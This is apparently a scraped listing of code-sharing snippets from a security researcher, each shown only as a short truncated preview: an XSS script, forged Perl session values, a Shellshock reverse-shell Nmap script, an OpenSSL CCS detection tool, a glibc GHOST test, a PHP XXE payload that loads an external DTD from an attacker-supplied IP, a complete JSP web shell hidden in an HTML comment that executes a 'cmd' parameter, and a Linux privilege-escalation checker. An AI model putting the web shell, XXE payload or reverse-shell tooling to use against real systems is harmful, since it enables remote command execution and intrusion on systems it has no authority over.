This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#Reddit XSS | |
#Author: Cheetz | |
import urllib2, sys | |
import logging, os, re, sys, urllib, string | |
from optparse import OptionParser | |
from urlparse import urlparse | |
class Lookup: | |
def run(self,url): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$sesshash{'ip'} = '68.227.245.145'; | |
$sesshash{'user'} = 'admin'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use CGI; | |
use Digest::MD5 qw(md5_hex); | |
$cgi = new CGI; | |
$SESSDIR = "/tmp/"; | |
$sessfile = $cgi->cookie("diagsess"); | |
$arg0 = $cgi->param("arg"); | |
$action = $cgi->param("action"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local http = require "http" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local vulns = require "vulns" | |
description = [[ | |
NSE script that delivers you a reverse shell using CVE-2014-6271. | |
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse | |
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status | |
<ip> -d |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python | |
import sys | |
import socket | |
import time | |
import struct | |
if len(sys.argv)<2: | |
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0]) | |
quit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<title>PHP Source Analyzer by Delicon</title> | |
<head> | |
<script language="JavaScript"> | |
function mouseDown_Action(c_id) { | |
var obj = document.getElementById(c_id); | |
if (obj.style.visibility == 'hidden') { | |
obj.style.visibility = 'visible'; | |
obj.style.position = 'static'; | |
} else { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <netdb.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <errno.h> | |
#include <gnu/libc-version.h> | |
#define CANARY "in_the_coal_mine" | |
struct { | |
char buffer[1024]; | |
char canary[sizeof(CANARY)]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$xml_data ='<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE roottage [ | |
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>"> | |
%dtd;]>'; | |
//<!ENTITY xxe SYSTEM "http://target/">]> | |
$URL = "https://target/"; | |
$ch = curl_init($URL); | |
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html')); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) | |
{ out.println(disr); disr = dis.readLine(); } } %> | |
--> | |
</head> | |
<body> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/env python | |
############################################################################################################### | |
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
##------------------------------------------------------------------------------------------------------------- | |
## [Details]: | |
## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
## passwords and applicable exploits. |